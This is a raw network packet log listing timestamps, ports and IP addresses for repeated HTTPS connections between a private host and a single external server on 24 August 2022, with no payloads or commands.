Aug 24, 2022 11:19:13.593205929 CEST	49326	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.594011068 CEST	49326	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.636764050 CEST	443	49326	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:13.709680080 CEST	443	49326	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:13.709780931 CEST	443	49326	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:13.709902048 CEST	49326	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.709999084 CEST	49326	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.720992088 CEST	49326	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.721031904 CEST	443	49326	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:13.861996889 CEST	49327	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.862049103 CEST	443	49327	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:13.862178087 CEST	49327	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.985773087 CEST	49327	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.985814095 CEST	443	49327	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:14.095665932 CEST	443	49327	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:14.095887899 CEST	49327	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:14.100878954 CEST	49327	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:14.100908995 CEST	443	49327	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:14.102775097 CEST	49327	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:14.102788925 CEST	443	49327	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:14.105566025 CEST	443	49327	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:14.105779886 CEST	49327	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:14.105798006 CEST	49327	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:14.105803967 CEST	49327	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:14.128508091 CEST	49327	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:14.129705906 CEST	49327	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:14.129924059 CEST	443	49327	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:14.130177975 CEST	49327	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:14.130203962 CEST	443	49327	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:14.130430937 CEST	49327	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:14.131100893 CEST	49327	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:14.145728111 CEST	49327	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:14.145816088 CEST	443	49327	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:14.244680882 CEST	443	49327	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:14.244802952 CEST	443	49327	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:14.244817972 CEST	49327	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:14.244951010 CEST	49327	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:14.255228996 CEST	49327	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:14.255251884 CEST	443	49327	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:15.656296015 CEST	49328	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:15.656342030 CEST	443	49328	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:15.656532049 CEST	49328	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:15.780884981 CEST	49328	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:15.780900955 CEST	443	49328	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:15.891827106 CEST	443	49328	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:15.892039061 CEST	49328	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:15.897264004 CEST	49328	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:15.897274971 CEST	443	49328	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:15.899324894 CEST	49328	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:15.899334908 CEST	443	49328	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:15.902298927 CEST	443	49328	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:15.902525902 CEST	49328	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:15.902534008 CEST	49328	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:15.902550936 CEST	49328	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:15.925081968 CEST	49328	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:15.926681995 CEST	49328	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:15.926872969 CEST	443	49328	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:15.927110910 CEST	49328	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:15.927124977 CEST	443	49328	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:15.927323103 CEST	49328	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:15.928253889 CEST	49328	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:15.968775034 CEST	443	49328	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:16.041384935 CEST	443	49328	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:16.041481972 CEST	443	49328	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:16.041568041 CEST	49328	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:16.041739941 CEST	49328	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:16.051568031 CEST	49328	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:16.051589012 CEST	443	49328	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:16.197526932 CEST	49329	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:16.197578907 CEST	443	49329	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:16.197706938 CEST	49329	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:16.322206020 CEST	49329	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:16.322246075 CEST	443	49329	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:16.430818081 CEST	443	49329	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:16.431109905 CEST	49329	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:16.435745001 CEST	49329	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:16.435775042 CEST	443	49329	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:16.437699080 CEST	49329	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:16.437728882 CEST	443	49329	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:16.440494061 CEST	443	49329	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:16.440717936 CEST	49329	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:16.440733910 CEST	49329	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:16.440778017 CEST	49329	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:16.463773966 CEST	49329	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:16.465281963 CEST	49329	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:16.465517998 CEST	443	49329	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:16.465744019 CEST	49329	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:16.465766907 CEST	443	49329	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:16.465981960 CEST	49329	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:16.466782093 CEST	49329	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:16.481096983 CEST	49329	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:16.481182098 CEST	443	49329	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:16.578474998 CEST	443	49329	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:16.578567028 CEST	443	49329	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:16.578650951 CEST	49329	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:16.578824997 CEST	49329	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:16.588733912 CEST	49329	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:16.588782072 CEST	443	49329	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:16.771693945 CEST	49330	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:16.771744013 CEST	443	49330	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:16.771872044 CEST	49330	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:16.896198034 CEST	49330	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:16.896240950 CEST	443	49330	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:17.004072905 CEST	443	49330	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:17.004235029 CEST	49330	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:17.009083986 CEST	49330	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:17.009114027 CEST	443	49330	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:17.011121988 CEST	49330	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:17.011152029 CEST	443	49330	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:17.013923883 CEST	443	49330	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:17.014233112 CEST	49330	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:17.014247894 CEST	49330	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:17.014254093 CEST	49330	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:17.036833048 CEST	49330	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:17.038317919 CEST	49330	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:17.038552999 CEST	443	49330	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:17.038804054 CEST	49330	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:17.038826942 CEST	443	49330	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:17.039037943 CEST	49330	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:17.039397001 CEST	49330	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:17.080822945 CEST	443	49330	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:17.150751114 CEST	443	49330	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:17.150849104 CEST	443	49330	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:17.150953054 CEST	49330	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:17.151094913 CEST	49330	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:17.161494970 CEST	49330	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:17.161531925 CEST	443	49330	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:17.918348074 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:17.918385983 CEST	443	49331	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:17.918642044 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.043689966 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.043708086 CEST	443	49331	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:18.154273033 CEST	443	49331	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:18.154431105 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.158487082 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.158499002 CEST	443	49331	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:18.160573959 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.160582066 CEST	443	49331	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:18.163492918 CEST	443	49331	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:18.163847923 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.163855076 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.163861990 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.187577963 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.189097881 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.189285994 CEST	443	49331	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:18.189461946 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.189477921 CEST	443	49331	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:18.189693928 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.190552950 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.232774019 CEST	443	49331	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:18.352941990 CEST	443	49331	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:18.352972984 CEST	443	49331	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:18.353096962 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.353116035 CEST	443	49331	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:18.353337049 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.353344917 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.353352070 CEST	443	49331	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:18.353357077 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.353360891 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.353363991 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.353463888 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.353472948 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.353477955 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.353482008 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.353581905 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.353861094 CEST	443	49331	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:18.353971958 CEST	443	49331	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:18.354234934 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.354247093 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.354250908 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.354336023 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.354341030 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.354346037 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.494842052 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.496078014 CEST	49331	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:18.496094942 CEST	443	49331	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:20.723977089 CEST	49332	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:20.724030018 CEST	443	49332	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:20.724206924 CEST	49332	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:21.654973984 CEST	49333	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:21.655025959 CEST	443	49333	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:21.655153990 CEST	49333	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:21.782067060 CEST	49333	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:21.782108068 CEST	443	49333	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:21.892155886 CEST	443	49333	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:21.892319918 CEST	49333	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:21.898384094 CEST	49333	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:21.898412943 CEST	443	49333	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:21.900038004 CEST	49333	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:21.900068998 CEST	443	49333	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:21.902817011 CEST	443	49333	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:21.903095961 CEST	49333	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:21.903186083 CEST	49333	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:21.903192997 CEST	49333	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:21.926115990 CEST	49333	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:21.927432060 CEST	49333	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:21.927671909 CEST	443	49333	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:21.927905083 CEST	49333	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:21.927927971 CEST	443	49333	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:21.928132057 CEST	49333	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:21.928904057 CEST	49333	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:21.972821951 CEST	443	49333	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:21.978607893 CEST	49332	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:21.978626013 CEST	443	49332	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:22.044344902 CEST	443	49333	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:22.044444084 CEST	443	49333	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:22.044483900 CEST	49333	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:22.044644117 CEST	49333	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:22.054209948 CEST	49333	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:22.054246902 CEST	443	49333	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:22.086483955 CEST	443	49332	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:22.086746931 CEST	49332	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:22.173891068 CEST	49332	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:22.173919916 CEST	443	49332	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:22.217240095 CEST	49332	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:22.217252970 CEST	443	49332	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:22.220036030 CEST	443	49332	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:22.220249891 CEST	49332	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:22.220268011 CEST	49332	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:22.220287085 CEST	49332	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:22.940449953 CEST	49332	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:22.983978987 CEST	49332	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:22.984200001 CEST	443	49332	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:22.984420061 CEST	49332	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:22.984438896 CEST	443	49332	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:22.984684944 CEST	49332	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.025862932 CEST	49332	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.036304951 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.036360979 CEST	443	49334	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.036489964 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.068820953 CEST	443	49332	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.133933067 CEST	443	49332	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.134052992 CEST	443	49332	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.134157896 CEST	49332	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.134308100 CEST	49332	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.162106037 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.162146091 CEST	443	49334	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.204021931 CEST	49332	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.204045057 CEST	443	49332	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.269828081 CEST	443	49334	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.269968987 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.276245117 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.276274920 CEST	443	49334	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.277817965 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.277832031 CEST	443	49334	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.280658007 CEST	443	49334	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.280849934 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.280865908 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.280942917 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.302304029 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.303575039 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.303641081 CEST	443	49334	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.303792000 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.303797960 CEST	443	49334	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.304029942 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.304979086 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.348822117 CEST	443	49334	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.470724106 CEST	443	49334	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.470757961 CEST	443	49334	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.470833063 CEST	443	49334	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.470961094 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.471066952 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.471076965 CEST	443	49334	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.471081972 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.471086025 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.471090078 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.471095085 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.471101999 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.471107960 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.471113920 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.471342087 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.471350908 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.472800970 CEST	443	49334	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.472827911 CEST	443	49334	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.473119020 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.473129988 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.473251104 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.473259926 CEST	443	49334	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.473267078 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.473270893 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.473424911 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.494441032 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.523372889 CEST	443	49334	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.523403883 CEST	443	49334	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.523690939 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.523708105 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.523819923 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.523835897 CEST	443	49334	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.523844004 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.523850918 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.524013996 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.524033070 CEST	443	49334	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.524049997 CEST	443	49334	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.524174929 CEST	443	49334	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.524265051 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.524435997 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.541850090 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.543171883 CEST	49334	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.543186903 CEST	443	49334	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.934914112 CEST	49335	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:23.934994936 CEST	443	49335	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:23.935165882 CEST	49335	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:24.059205055 CEST	49335	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:24.059247971 CEST	443	49335	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:24.171319008 CEST	443	49335	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:24.171494961 CEST	49335	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:24.177162886 CEST	49335	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:24.177186012 CEST	443	49335	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:24.178956032 CEST	49335	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:24.178968906 CEST	443	49335	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:24.180869102 CEST	443	49335	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:24.181220055 CEST	49335	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:24.181226969 CEST	49335	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:24.181230068 CEST	49335	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:24.204669952 CEST	49335	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:24.206202030 CEST	49335	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:24.206340075 CEST	443	49335	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:24.206582069 CEST	49335	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:24.206594944 CEST	443	49335	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:24.206722975 CEST	49335	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:24.207602024 CEST	49335	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:24.248776913 CEST	443	49335	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:24.268745899 CEST	49336	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:24.268776894 CEST	443	49336	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:24.269027948 CEST	49336	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:24.319937944 CEST	443	49335	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:24.319998980 CEST	443	49335	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:24.320225000 CEST	49335	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:24.320251942 CEST	49335	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:24.372304916 CEST	49335	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:24.372333050 CEST	443	49335	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:26.613476038 CEST	49336	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:26.613497972 CEST	443	49336	45.82.153.92	192.168.0.53
